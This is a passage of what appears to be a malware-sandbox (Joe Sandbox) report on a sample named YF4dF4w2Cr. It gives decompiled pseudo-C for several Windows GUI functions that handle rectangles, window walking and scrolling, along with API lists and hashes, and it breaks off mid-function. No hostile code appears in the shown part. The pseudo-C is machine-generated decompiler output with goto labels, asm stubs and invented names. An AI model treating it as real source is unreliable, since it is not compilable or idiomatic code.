                  • Instruction ID: c3a8ff1e6a70369a334e9d65533ec26824e18546c235e0bade0a9994c07655bf
                  • Opcode Fuzzy Hash: b6a56586d83474ba617ffbc4177e26df6ea37e987274d3318c0e5c86094dc973
                  • Instruction Fuzzy Hash: 1AD0C232B442207BD2212F726D4DA163E80BB89BA33594661BC26E31D0CAA8CC008758
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E0041B7FA(void* __ecx, void* __eflags, signed int _a4) {
                  				intOrPtr _v8;
                  				char _v12;
                  				int _v20;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t46;
                  				int _t48;
                  				int _t50;
                  				signed int _t57;
                  				int _t71;
                  				void* _t73;
                  				signed int _t74;
                  				signed int _t76;
                  				signed int _t77;
                  				int _t78;
                  				void* _t79;
                  				signed int _t84;
                  				int _t87;
                  				signed int _t93;
                  				void* _t95;
                  				void* _t96;
                  				struct tagRECT* _t98;
                  
                  				_t84 = _a4 * 0x28;
                  				_t95 = __ecx;
                  				_t96 = _t84 +  *((intOrPtr*)(__ecx + 0xb0));
                  				E0041B77A(__ecx, __eflags,  &_v12);
                  				_t87 =  *(_t96 + 0x24);
                  				_t93 = 0 |  *(_t96 + 0x20) - _t87 < 0x00000000;
                  				_t46 =  *((intOrPtr*)(__ecx + 0x10c));
                  				if(_t46 == 0) {
                  					 *(_t96 + 0x18) =  *(_t96 + 0x20);
                  					_t48 =  *(_t96 + 0x24);
                  					goto L12;
                  				} else {
                  					_t73 = _t46 - 1;
                  					if(_t73 == 0) {
                  						 *(_t96 + 0x1c) = _t87;
                  						_t74 =  *(_t96 + 0x20);
                  						__eflags = _t93;
                  						if(_t93 == 0) {
                  							_t76 = _t74 * 3 - _t87;
                  							__eflags = _t76;
                  						} else {
                  							_t76 = _t74 + _t87;
                  						}
                  						asm("cdq");
                  						_t77 = _t76 - _t93;
                  						__eflags = _t77;
                  						_t78 = _t77 >> 1;
                  						goto L10;
                  					} else {
                  						_t79 = _t73 - 1;
                  						if(_t79 == 0) {
                  							if(_t93 == 0) {
                  								 *(_t96 + 0x1c) = _t87;
                  								_t78 =  *(_t96 + 0x20) +  *(_t96 + 0x20) -  *(_t96 + 0x24);
                  								L10:
                  								 *(_t96 + 0x18) = _t78;
                  							} else {
                  								_t48 = _t79 + 1;
                  								 *(_t96 + 0x18) = _t48;
                  								L12:
                  								 *(_t96 + 0x1c) = _t48;
                  							}
                  						}
                  					}
                  				}
                  				_v20 = MulDiv( *(_t96 + 0x10),  *(_t96 + 0x18),  *(_t96 + 0x1c));
                  				_t50 = MulDiv( *(_t96 + 0x14),  *(_t96 + 0x18),  *(_t96 + 0x1c));
                  				_t98 =  *((intOrPtr*)(_t95 + 0xb0)) + _t84;
                  				SetRect(_t98, 8, 8, _v20 + 0xb, _t50 + 0xb);
                  				if( *((intOrPtr*)(_t95 + 0x10c)) != 0) {
                  					_push(0x4527fc);
                  					_push( &_v12);
                  					_push(_t98->bottom - _t98->top + 0x10);
                  					_t57 = _t98->right - _t98->left + 0x10;
                  					__eflags = _t57;
                  					_push(_t57);
                  					_push(1);
                  					return E00419E93(_t84, _t95, _t95, _t98, _t57);
                  				}
                  				asm("cdq");
                  				asm("cdq");
                  				_t71 = OffsetRect(_t98, (_t98->left - _t98->right + _v12 - _t93 >> 1) - 1, (_t98->top - _t98->bottom + _v8 - _t93 >> 1) - 1);
                  				if(_a4 == 1) {
                  					return OffsetRect(_t98,  *(_t95 + 0x11c), 0);
                  				}
                  				return _t71;
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Offset
                  • String ID:
                  • API String ID: 3858320380-0
                  • Opcode ID: 16094ef62ffa5adcbd37ecc287b6900c4b621fc2971993f42e863f422f150e29
                  • Instruction ID: ccfb9802a9b83407f1a75f79d1d276e713992f87681ada11129c972e46a4a06c
                  • Opcode Fuzzy Hash: 16094ef62ffa5adcbd37ecc287b6900c4b621fc2971993f42e863f422f150e29
                  • Instruction Fuzzy Hash: C2417C71600A05AFC724DF69C984BA6BBF9FF48704B048A2DE986C2651D734F8858F98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 82%
                  			E0041B982(intOrPtr __ecx, intOrPtr __edx, int* _a4, signed int* _a8) {
                  				intOrPtr _v8;
                  				struct tagRECT _v24;
                  				struct tagRECT _v40;
                  				signed int _t56;
                  				signed int* _t68;
                  				signed int _t75;
                  				int _t82;
                  				intOrPtr* _t86;
                  				int* _t88;
                  				intOrPtr _t90;
                  				int _t96;
                  				intOrPtr _t98;
                  				intOrPtr _t101;
                  				signed int* _t103;
                  				intOrPtr _t108;
                  
                  				_t98 = __edx;
                  				_t88 = _a4;
                  				_t101 = __ecx;
                  				_v8 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x10c)) != 0) {
                  					_t86 = E0041954D(__ecx,  &(_v24.right));
                  					 *_t88 =  *_t88 +  *_t86;
                  					_t88[1] = _t88[1] +  *((intOrPtr*)(_t86 + 4));
                  				}
                  				GetClientRect( *(_t101 + 0x20),  &_v40);
                  				 *_a8 = 0;
                  				if( *((intOrPtr*)(_t101 + 0x118)) > 0) {
                  					while(1) {
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						_t108 = _v8;
                  						if( *((intOrPtr*)(_t108 + 0x10c)) == 0) {
                  							goto L12;
                  						}
                  						asm("cdq");
                  						_t75 = _v40.right - _v24.right - _v40.left + _v24.left - 0x10 - _t98;
                  						_t98 = _v24.top;
                  						_t96 = (_t75 >> 1) - 1;
                  						asm("cdq");
                  						_t82 = (_v40.bottom - _v24.bottom - _v40.top + _t98 - 0x10 - _t98 >> 1) - 1;
                  						if(_t96 < 0) {
                  							_t96 = 0;
                  						}
                  						if(_t82 < 0) {
                  							_t82 = 0;
                  						}
                  						OffsetRect( &_v24, _t96, _t82);
                  						L12:
                  						_push(_t88[1]);
                  						if(PtInRect( &_v24,  *_t88) != 0) {
                  							_t103 = _a8;
                  							_t90 =  *((intOrPtr*)(_t108 + 0xb0));
                  							_t56 =  *_t103 * 0x28;
                  							_t88[1] = _t88[1] -  *((intOrPtr*)(_t56 + _t90 + 4));
                  							 *_t88 =  *_t88 -  *((intOrPtr*)(_t56 + _t90));
                  							 *_t88 = MulDiv( *_t88,  *( *_t103 * 0x28 +  *((intOrPtr*)(_t108 + 0xb0)) + 0x1c),  *( *_t103 * 0x28 +  *((intOrPtr*)(_t108 + 0xb0)) + 0x18));
                  							_t88[1] = MulDiv(_t88[1],  *( *_t103 * 0x28 +  *((intOrPtr*)(_t108 + 0xb0)) + 0x1c),  *( *_t103 * 0x28 +  *((intOrPtr*)(_t108 + 0xb0)) + 0x18));
                  							return 1;
                  						}
                  						_t68 = _a8;
                  						 *_t68 =  *_t68 + 1;
                  						if( *_t68 <  *((intOrPtr*)(_t108 + 0x118))) {
                  							_t101 = _t108;
                  							continue;
                  						}
                  						goto L3;
                  					}
                  				} else {
                  					L3:
                  					return 0;
                  				}
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$ClientOffset
                  • String ID:
                  • API String ID: 3549191583-0
                  • Opcode ID: de84f664adc04d7a299dcc5e4241c8d52e4674e42483e1f77b1656c7517c78ac
                  • Instruction ID: aae755c7d603de1c4d8fe7bf5bc3c6ce9542f4a2377bef0a616500828aae3046
                  • Opcode Fuzzy Hash: de84f664adc04d7a299dcc5e4241c8d52e4674e42483e1f77b1656c7517c78ac
                  • Instruction Fuzzy Hash: 0C415E76600606EFCB05CFA9C984DEABBF6FF49300B05856AE915EB264D734E941CF90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E00419E93(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				struct tagPOINT* _t75;
                  				long* _t77;
                  				long* _t80;
                  				struct tagPOINT* _t81;
                  				signed int _t83;
                  				signed int _t84;
                  				signed int _t85;
                  				signed int _t89;
                  				signed int _t90;
                  				signed int _t91;
                  				signed int _t92;
                  				struct tagPOINT* _t97;
                  				signed int _t98;
                  				signed int _t107;
                  				void* _t115;
                  				signed int _t117;
                  				signed int _t118;
                  				void* _t120;
                  				void* _t121;
                  				void* _t122;
                  
                  				_t122 = __eflags;
                  				_push(0x18);
                  				E00431A9B(E0044B727, __ebx, __edi, __esi);
                  				_t120 = __ecx;
                  				 *(_t121 - 0x10) =  *(__ecx + 0x5c);
                  				 *(__ecx + 0x5c) =  *(_t121 + 8);
                  				 *((intOrPtr*)(__ecx + 0x60)) =  *((intOrPtr*)(_t121 + 0xc));
                  				_push(0);
                  				 *((intOrPtr*)(__ecx + 0x64)) =  *((intOrPtr*)(_t121 + 0x10));
                  				E00422EAE(__ebx, _t121 - 0x24, __edi, __ecx, _t122);
                  				 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
                  				E004225FF(_t121 - 0x24,  *((intOrPtr*)(_t120 + 0x5c)));
                  				_t115 = LPtoDP;
                  				_t75 = _t120 + 0x68;
                  				_t75->x =  *(_t120 + 0x60);
                  				_t75->y =  *(_t120 + 0x64);
                  				LPtoDP( *(_t121 - 0x1c), _t75, 1);
                  				_t77 =  *(_t121 + 0x14);
                  				_t97 = _t120 + 0x70;
                  				_t97->x =  *_t77;
                  				_t97->y = _t77[1];
                  				LPtoDP( *(_t121 - 0x1c), _t97, 1);
                  				_t80 =  *(_t121 + 0x18);
                  				_t81 = _t120 + 0x78;
                  				_t81->x =  *_t80;
                  				_t81->y = _t80[1];
                  				LPtoDP( *(_t121 - 0x1c), _t81, 1);
                  				_t83 =  *(_t120 + 0x6c);
                  				if(_t83 < 0) {
                  					 *(_t120 + 0x6c) =  ~_t83;
                  				}
                  				_t84 =  *(_t120 + 0x74);
                  				if(_t84 < 0) {
                  					 *(_t120 + 0x74) =  ~_t84;
                  				}
                  				_t85 =  *(_t120 + 0x7c);
                  				_t125 = _t85;
                  				if(_t85 < 0) {
                  					 *(_t120 + 0x7c) =  ~_t85;
                  				}
                  				 *(_t121 - 4) =  *(_t121 - 4) | 0xffffffff;
                  				_t86 = E00422F02(_t97, _t121 - 0x24, _t115, _t120, _t125);
                  				_t107 = 0xa;
                  				if(_t97->x == 0) {
                  					_t92 =  *(_t120 + 0x68);
                  					asm("cdq");
                  					_t118 = _t107;
                  					_t86 = _t92 / _t118;
                  					_t97->x = _t92 / _t118;
                  				}
                  				if( *(_t120 + 0x74) == 0) {
                  					_t91 =  *(_t120 + 0x6c);
                  					asm("cdq");
                  					_t117 = _t107;
                  					_t86 = _t91 / _t117;
                  					 *(_t120 + 0x74) = _t91 / _t117;
                  				}
                  				if( *(_t120 + 0x78) == 0) {
                  					_t90 = _t97->x;
                  					asm("cdq");
                  					_t98 = _t107;
                  					_t86 = _t90 / _t98;
                  					 *(_t120 + 0x78) = _t90 / _t98;
                  				}
                  				if( *(_t120 + 0x7c) == 0) {
                  					_t89 =  *(_t120 + 0x74);
                  					asm("cdq");
                  					_t86 = _t89 / _t107;
                  					 *(_t120 + 0x7c) = _t89 / _t107;
                  				}
                  				if( *(_t120 + 0x20) != 0) {
                  					E00419793(_t120);
                  					_t86 =  *(_t121 - 0x10);
                  					if( *(_t121 - 0x10) !=  *((intOrPtr*)(_t120 + 0x5c))) {
                  						_t86 = InvalidateRect( *(_t120 + 0x20), 0, 1);
                  					}
                  				}
                  				return E00431B73(_t86);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00419E9A
                    • Part of subcall function 00422EAE: __EH_prolog3.LIBCMT ref: 00422EB5
                    • Part of subcall function 00422EAE: GetWindowDC.USER32(00000000,00000004,00419EC3,00000000,00000018,00418677,00000001,?,?,004527FC,004527FC), ref: 00422EE1
                    • Part of subcall function 004225FF: SetMapMode.GDI32(?,?), ref: 0042261C
                    • Part of subcall function 004225FF: SetMapMode.GDI32(?,?), ref: 00422629
                  • LPtoDP.GDI32(?,00000000,00000001), ref: 00419EEC
                  • LPtoDP.GDI32(?,?,00000001), ref: 00419F04
                  • LPtoDP.GDI32(?,?,00000001), ref: 00419F1C
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00419FAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Mode$InvalidateRectWindow
                  • String ID:
                  • API String ID: 1124340077-0
                  • Opcode ID: 5e92dc9d8927e779996eaefea1d6ec7addeb9903d75ce59e16476182e28c8fb1
                  • Instruction ID: ff3a48c6707479a703a385a6b95aa5d7b8bb46ad7457f72f60557dc521b21950
                  • Opcode Fuzzy Hash: 5e92dc9d8927e779996eaefea1d6ec7addeb9903d75ce59e16476182e28c8fb1
                  • Instruction Fuzzy Hash: 7F410470640B099FDB21DF2AC981AAAB7F5BF49704F10882EE596D77A0D774E841CF14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00424CB8(void* __ecx, void* __eflags, intOrPtr _a8) {
                  				signed int _v8;
                  				struct tagRECT _v24;
                  				signed int _t44;
                  				signed int _t48;
                  				signed int _t52;
                  				signed int _t57;
                  				void* _t64;
                  				signed int _t67;
                  				void* _t75;
                  				void* _t76;
                  				signed int _t78;
                  				void* _t80;
                  
                  				_t80 = __eflags;
                  				_t75 = __ecx;
                  				_v8 = E00412B38(__ecx);
                  				GetWindowRect( *(__ecx + 0x20),  &_v24);
                  				_t67 = GetSystemMetrics(0x21);
                  				_t78 = GetSystemMetrics(0x20);
                  				_t76 = E0040ED96(_t75, _t80);
                  				if((_v8 & 0x00001000) == 0) {
                  					L5:
                  					__eflags = _t76 - 0xa;
                  					if(_t76 < 0xa) {
                  						L7:
                  						__eflags = _t76 - 4;
                  						if(_t76 != 4) {
                  							L16:
                  							return _t76;
                  						}
                  						L8:
                  						__eflags = _v8 & 0x00000800;
                  						if((_v8 & 0x00000800) == 0) {
                  							InflateRect( &_v24,  ~_t78,  ~_t67);
                  							__eflags = _v8 & 0x00000200;
                  							if((_v8 & 0x00000200) == 0) {
                  								goto L16;
                  							}
                  							_t44 = _t76 - 4;
                  							__eflags = _t44;
                  							if(_t44 == 0) {
                  								L21:
                  								__eflags = _a8 - _v24.bottom;
                  								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
                  							}
                  							_t48 = _t44 - 9;
                  							__eflags = _t48;
                  							if(_t48 == 0) {
                  								__eflags = _a8 - _v24.top;
                  								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
                  							}
                  							_t52 = _t48 - 1;
                  							__eflags = _t52;
                  							if(_t52 == 0) {
                  								__eflags = _a8 - _v24.top;
                  								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
                  							}
                  							_t57 = _t52;
                  							__eflags = _t57;
                  							if(_t57 == 0) {
                  								__eflags = _a8 - _v24.bottom;
                  								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
                  							}
                  							__eflags = _t57 == 1;
                  							if(_t57 == 1) {
                  								goto L21;
                  							}
                  							goto L16;
                  						}
                  						_t64 = 2;
                  						return _t64;
                  					}
                  					__eflags = _t76 - 0x11;
                  					if(_t76 <= 0x11) {
                  						goto L8;
                  					}
                  					goto L7;
                  				}
                  				if(_t76 == 3) {
                  					_t76 = 2;
                  				}
                  				if(GetKeyState(2) >= 0) {
                  					goto L5;
                  				} else {
                  					return 0;
                  				}
                  			}

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetWindowRect.USER32 ref: 00424CD4
                  • GetSystemMetrics.USER32 ref: 00424CE2
                  • GetSystemMetrics.USER32 ref: 00424CE8
                  • GetKeyState.USER32(00000002), ref: 00424D08
                  • InflateRect.USER32(?,00000000,00000000), ref: 00424D3E
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsRectSystemWindow$InflateLongState
                  • String ID:
                  • API String ID: 2406722796-0
                  • Opcode ID: b7e1fb10cf98936029ff3779083299cd64c9a269c6d8fca835f4ba8cdf550397
                  • Instruction ID: e3ecd6cb329665b2cd8a2448089bf16f9698f38525433f5d73bdf6f6ead89f03
                  • Opcode Fuzzy Hash: b7e1fb10cf98936029ff3779083299cd64c9a269c6d8fca835f4ba8cdf550397
                  • Instruction Fuzzy Hash: F631F732B20128ABDB30DBA8F849AAF77A4EBC5394F954417D502D7180DA7CDD41C659
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 97%
                  			E0040FBD2(signed int __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
                  				struct HWND__* _t29;
                  				signed int _t32;
                  				signed int _t36;
                  				signed int _t38;
                  				struct HWND__* _t53;
                  				void* _t54;
                  				void* _t55;
                  
                  				_t55 = __eflags;
                  				_t42 = __ebx;
                  				_push(0x80);
                  				E00431A9B(E0044B06E, __ebx, __edi, __esi);
                  				 *(_t54 - 0x10) = __ecx;
                  				E004125EB(_t54 - 0x38);
                  				_t45 = _t54 - 0x8c;
                  				E0040D77C(_t54 - 0x8c, _t55);
                  				 *(_t54 - 4) = 0;
                  				_t29 = GetTopWindow( *(__ecx + 0x20));
                  				while(1) {
                  					_t53 = _t29;
                  					if(_t53 == 0) {
                  						break;
                  					}
                  					 *(_t54 - 0x6c) = _t53;
                  					 *((intOrPtr*)(_t54 - 0x34)) = GetDlgCtrlID(_t53);
                  					 *((intOrPtr*)(_t54 - 0x24)) = _t54 - 0x8c;
                  					_t32 = E0040EE68(_t45, 0, _t53, __eflags, _t53);
                  					__eflags = _t32;
                  					if(_t32 == 0) {
                  						L3:
                  						_t45 =  *(_t54 - 0x10);
                  						__eflags = E0041246B( *(_t54 - 0x10), 0, _t53,  *((intOrPtr*)(_t54 - 0x34)), 0xffffffff, _t54 - 0x38, 0);
                  						if(__eflags == 0) {
                  							_t42 =  *(_t54 + 0xc);
                  							__eflags = _t42;
                  							if(_t42 != 0) {
                  								_t36 = SendMessageA( *(_t54 - 0x6c), 0x87, 0, 0);
                  								__eflags = _t36 & 0x00002000;
                  								if((_t36 & 0x00002000) == 0) {
                  									L10:
                  									_t42 = 0;
                  									__eflags = 0;
                  								} else {
                  									_t38 = E00412B38(_t54 - 0x8c) & 0x0000000f;
                  									__eflags = _t38 - 3;
                  									if(_t38 == 3) {
                  										goto L10;
                  									} else {
                  										__eflags = _t38 - 6;
                  										if(_t38 == 6) {
                  											goto L10;
                  										} else {
                  											__eflags = _t38 - 7;
                  											if(_t38 == 7) {
                  												goto L10;
                  											} else {
                  												__eflags = _t38 - 9;
                  												if(_t38 == 9) {
                  													goto L10;
                  												}
                  											}
                  										}
                  									}
                  								}
                  							}
                  							_t45 = _t54 - 0x38;
                  							E00412611(_t54 - 0x38,  *((intOrPtr*)(_t54 + 8)), _t42);
                  						}
                  					} else {
                  						_t45 = _t32;
                  						__eflags = E0041246B(_t32, 0, _t53, 0, 0xbd11ffff, _t54 - 0x38, 0);
                  						if(__eflags == 0) {
                  							goto L3;
                  						}
                  					}
                  					_t29 = GetWindow(_t53, 2);
                  				}
                  				_t21 = _t54 - 4;
                  				 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
                  				 *(_t54 - 0x6c) = 0;
                  				return E00431B73(E0040F76D(_t42, _t54 - 0x8c, 0, _t53,  *_t21));
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0040FBDC
                  • GetTopWindow.USER32(?), ref: 0040FC01
                  • GetDlgCtrlID.USER32 ref: 0040FC10
                  • SendMessageA.USER32(00000087,00000087,00000000,00000000), ref: 0040FC69
                  • GetWindow.USER32(00000000,00000002), ref: 0040FCA9
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$CtrlH_prolog3MessageSend
                  • String ID:
                  • API String ID: 849854284-0
                  • Opcode ID: b91585d9f724a2dc4af9cf88251d3bb40864db0c4308cd8b887a07d56b25a55e
                  • Instruction ID: 2ec04b22e0cf5ce468d851c06280b4cd055a4feba6f59ded0add44badfe227aa
                  • Opcode Fuzzy Hash: b91585d9f724a2dc4af9cf88251d3bb40864db0c4308cd8b887a07d56b25a55e
                  • Instruction Fuzzy Hash: 0B216F71804218AAEB25EFA6CD8A9EEB674BF55304F10463AF811F35D0EB785E44CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E00405112(intOrPtr __ecx, void* __eflags, struct tagRECT* _a4) {
                  				intOrPtr _v8;
                  				signed int _v12;
                  				void* __ebx;
                  				void* _t23;
                  				void* _t39;
                  				long _t41;
                  				void* _t45;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_v8 = __ecx;
                  				_t45 = E0040474E(__ecx);
                  				_t39 = E004045BE(0, _t45, 0);
                  				if(_t39 == 0 || _t39 == _v8) {
                  					_v12 = GetWindowLongA( *(_t45 + 0xe8), 0xffffffec);
                  					if(_t39 == 0 || (E00412B52(_v8) & 0x00000200) != 0 || (E00412B38(_v8) & 0x01000000) == 0) {
                  						_t41 = _v12 | 0x00000200;
                  					} else {
                  						_t41 = _v12 & 0xfffffdff;
                  					}
                  					if(_v12 == _t41) {
                  						goto L11;
                  					} else {
                  						RedrawWindow( *(_t45 + 0xe8), 0, 0, 0x81);
                  						SetWindowLongA( *(_t45 + 0xe8), 0xffffffec, _t41);
                  						SetWindowPos( *(_t45 + 0xe8), 0, 0, 0, 0, 0, 0x137);
                  						if(_a4 != 0) {
                  							GetClientRect( *(_t45 + 0xe8), _a4);
                  						}
                  						_t23 = 1;
                  					}
                  				} else {
                  					L11:
                  					_t23 = 0;
                  				}
                  				return _t23;
                  			}











                  APIs
                    • Part of subcall function 0040474E: GetParent.USER32(?), ref: 0040475A
                    • Part of subcall function 0040474E: GetParent.USER32(00000000), ref: 0040475D
                  • GetWindowLongA.USER32 ref: 00405147
                  • RedrawWindow.USER32(?,00000000,00000000,00000081), ref: 00405198
                  • SetWindowLongA.USER32 ref: 004051A7
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137), ref: 004051BD
                  • GetClientRect.USER32 ref: 004051D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$LongParent$ClientRectRedraw
                  • String ID:
                  • API String ID: 556606033-0
                  • Opcode ID: 4ba79fdda7cda7382cc20deb3ffb3e4f90149cdee4478f17621874e7fee797b8
                  • Instruction ID: 7aaf3126d674e3e7048fbaf7b7e8ae3f530f56a6ff30dac5665c823baf7d5697
                  • Opcode Fuzzy Hash: 4ba79fdda7cda7382cc20deb3ffb3e4f90149cdee4478f17621874e7fee797b8
                  • Instruction Fuzzy Hash: F211D232900508FFDB206F65CC45FAFBA79EB81350F21463AF516BA1E0CA355D41CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E0040DBCC(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
                  				struct tagRECT _v20;
                  				int _t22;
                  				struct HWND__* _t23;
                  				struct HWND__* _t42;
                  				void* _t43;
                  
                  				_t43 = __ecx;
                  				_t22 = IsWindowVisible( *(__ecx + 0x20));
                  				if(_t22 != 0 || _a12 != _t22 || _a16 != _t22) {
                  					_t23 = ScrollWindow( *(_t43 + 0x20), _a4, _a8, _a12, _a16);
                  				} else {
                  					_push(5);
                  					_push( *(_t43 + 0x20));
                  					while(1) {
                  						_t23 = GetWindow();
                  						_t42 = _t23;
                  						if(_t42 == 0) {
                  							break;
                  						}
                  						GetWindowRect(_t42,  &_v20);
                  						E00422BFB(_t43,  &_v20);
                  						SetWindowPos(_t42, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
                  						_push(2);
                  						_push(_t42);
                  					}
                  				}
                  				if( *((intOrPtr*)(_t43 + 0x4c)) != 0 && _a12 == 0) {
                  					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x4c)))) + 0x5c))(_a4, _a8);
                  				}
                  				return _t23;
                  			}









                  APIs
                  • IsWindowVisible.USER32(?), ref: 0040DBDC
                  • GetWindowRect.USER32 ref: 0040DC02
                  • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 0040DC2D
                  • GetWindow.USER32(00000005,00000005), ref: 0040DC36
                  • ScrollWindow.USER32 ref: 0040DC4F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$RectScrollVisible
                  • String ID:
                  • API String ID: 2639402888-0
                  • Opcode ID: c6ae3ab3e4dfc37bb24cc7cc2e8b6ebdd03b97594dd71bc502e0e0f5d8dbd6e7
                  • Instruction ID: bf826b1d1b6a4b04d0006aacfa26414d2043573755bd92c3dfe28e5c2cba6bea
                  • Opcode Fuzzy Hash: c6ae3ab3e4dfc37bb24cc7cc2e8b6ebdd03b97594dd71bc502e0e0f5d8dbd6e7
                  • Instruction Fuzzy Hash: 14215E36600209BFDF258FA5CC48EBF77BAFB88310F04442AFA45A2290E7B4D811DB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E00408A69(void* __ecx, unsigned int _a4) {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HWND__* _t20;
                  				void* _t21;
                  				void* _t23;
                  				void* _t27;
                  				void* _t33;
                  				void* _t35;
                  				struct HWND__* _t36;
                  
                  				_t28 = __ecx;
                  				_t35 = __ecx;
                  				if((E00412B38(__ecx) & 0x40000000) == 0) {
                  					_t28 = __ecx;
                  					_t27 = E0040F8D7(__ecx);
                  				} else {
                  					_t27 = __ecx;
                  				}
                  				_t38 = _t27;
                  				if(_t27 == 0) {
                  					E00406436(_t27, _t28, _t33, _t35, _t38);
                  				}
                  				if((_a4 & 0x0000000c) != 0) {
                  					_t23 = E00412C5B(_t27);
                  					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t27 == _t35) {
                  						SendMessageA( *(_t27 + 0x20), 0x86, 0, 0);
                  					} else {
